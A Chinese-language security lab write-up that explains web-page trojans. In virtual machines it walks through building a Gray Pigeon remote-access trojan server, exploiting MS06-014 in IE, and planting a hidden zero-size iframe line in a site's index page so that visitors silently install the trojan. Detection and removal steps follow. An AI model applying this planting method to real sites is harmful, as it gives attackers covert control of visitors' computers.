網頁掛馬原理

網頁木馬

一、實驗目的

1.理解網頁木馬的工作原理

2.熟悉木馬的植入過程

3.學會利用網頁木馬腳本

二、實驗環境

1.系統環境：Windows環境， XP環境

2.軟件工具：灰鴿子

三、實驗原理

網頁木馬原理及相關定義
瀏覽器是用來解釋和顯示萬維網文檔的程序，已經成為用戶上網時必不可少的工具之一。“網頁木馬”由其植入方式而得名，是通過瀏覽網頁的方式植入到被控制主機上，並對被控制主機進行控制木馬。與其它網頁不同，木馬網頁是黑客精心制作的，用戶一旦訪問了該網頁就會中木馬。其中原理是：因為嵌入在這個網頁中的腳本利用了IE瀏覽器的漏洞，讓IE在后台自動下載黑客放置在網絡上的木馬並運行（安裝）這個木馬，也就是說這個網頁能下載木馬到本地並運行（安裝）下載本地電腦上的木馬，整個過程都在后台運行，用戶一旦打開這個網頁，下載過程和運行（安裝）過程就自動開始了。
如果打開一個網頁，IE瀏覽器真的能自動下載程序並運行程序嗎？如果IE真的能肆無忌憚地任意下載和運行程序，那么用戶將會面臨巨大的威脅。實際上，為了安全IE瀏覽器是禁止自動下載程序特別是運行程序的，但是IE瀏覽器存在着一些已知和未知的漏洞網頁木馬就是利用這些漏洞獲得權限來下載程序和運行程序的。
利用Microsoft的MS06014漏洞，完成網頁木馬的植入。

四、實驗步驟

生成網頁木馬與掛馬過程：

打開window7虛擬機，打開實驗程序中H-Clinet.exe灰鴿子程序。單擊配置服務程序按鈕，在文本框中輸入本機IP地址，選擇路徑保存在C:\Apache2.2\htdocs文件夾中，單擊生成服務器按鈕，在htdocs文件夾中生成木馬程序Server-Setup.exe，如下圖所示：

利用網頁木馬腳本，用記事本打開guama-實驗程序文件夾-trojan.htm文件，修改其源代碼中的IP地址為Windows7的IP地址：192.168.70.133，，如下圖所示：

然后將修改后的trojan.htm腳本文件保存到C:\Apache2.2\htdocs目錄下，C:\Apache2.2\htdocs目錄為木馬網站的網站空間目錄，如下圖所示：

對默認網站進行掛馬，進入C:\Apache\htdocs目錄。使用記事本打開index.html文件，加入一行代碼：<iframe src=’’trojan.htm’’ name=’’jlcss’’ windth=0 height=0 frameborder=0>，如下圖所示：

開啟Apache，如下圖所示：

開始木馬的植入，打開XP虛擬機，打開IE瀏覽器訪問http://192.168.70.133，如下圖所示：

返回Windows7虛擬機中，灰鴿子軟件界面“自動上線主機”中顯示有主機上線，木馬植入成功！如下圖所示：

在XP虛擬機中，打開C:\WINDIWS文件目錄，會發現生成了可執行文件Hacker.com.cn.exe，如下圖所示：

右擊我的電腦-管理-服務，觀察到木馬安裝時自動生成系統服務GrayPigeon_Hacker.com.cn.exe已經啟動。GrayPigeon_Hacker.com.cn.exe的可執行文件路徑：“C:\WINDWOS\Hacker.com.cn.exe”可以看出灰鴿子是通過此系統服務執行Hacker.com.cn.exe文件來自啟動木馬服務器，如下圖所示：

灰鴿子木馬服務器安裝完成后就會立刻連接網絡尋找其客戶端，並與其建立連接。這時木馬程序會將自己的進程命名為IEXPLORE.EXE，打開命令行窗口，輸入netstat -ano查看每個網絡連接的進程ID，再打開任務管理器，發現端口為8000的TCP連接的進程ID剛好為木馬偽裝的程序IEXPLORE.EXE的進程ID，如下圖所示：

木馬的刪除：
自動刪除，通過使用“灰鴿子遠程控制”程序卸載木馬的“服務器”程序。具體做法：選擇上線主機，單擊“遠程控制命令”屬性頁，單擊界面右側的“卸載服務端”按鈕，卸載木馬的“服務器”程序，如下圖所示：

手動刪除：
（1） 打開XP虛擬機，啟動IE瀏覽器，單擊菜單欄-工具-Internet選項，彈出Internet選項配置對話框，單擊“刪除文件”按鈕，在彈出的“刪除文件”對話框中，選擇“刪除所有脫機內容”復選框，單擊“確定”按鈕直到完成
（2） 雙擊“我的電腦”，在瀏覽器中單擊“工具”-“文件夾選項”菜單項，單擊“查看”屬性頁，選中“顯示所有文件和文件夾”，並將“隱藏收保護的操作系統文件”復選框置為不選中狀態，單擊“確定”按鈕
（3） 關閉已打開的web頁面，啟動“windows”任務管理器，單擊“進程”屬性頁，在“印象名稱”中選中所有“IEXPLORE.EXE”進程，單擊“結束進程”按鈕
（4） 刪除“C:\WINDOWS\Hacker.com.cn.exe”文件
（5） 啟動“服務”管理器，選中右側詳細列表中的“GrayPigeon_Hacker.com.cn”，單擊右鍵，在彈出菜單選中“屬性”菜單項，在彈出的對話框中，將“啟動類型”改為“禁用”，單擊“確定”按鈕
（6） 啟動注冊表編輯器，刪除HKEY_LOCAL_MACHINE\SYSTEM\CurrentContronlSet\Service\GrayPigeon_Hacker.com.cn節點
（7） 重新啟動計算機
（8） 打開灰鴿子程序，查看自動上線主機，已經不存在了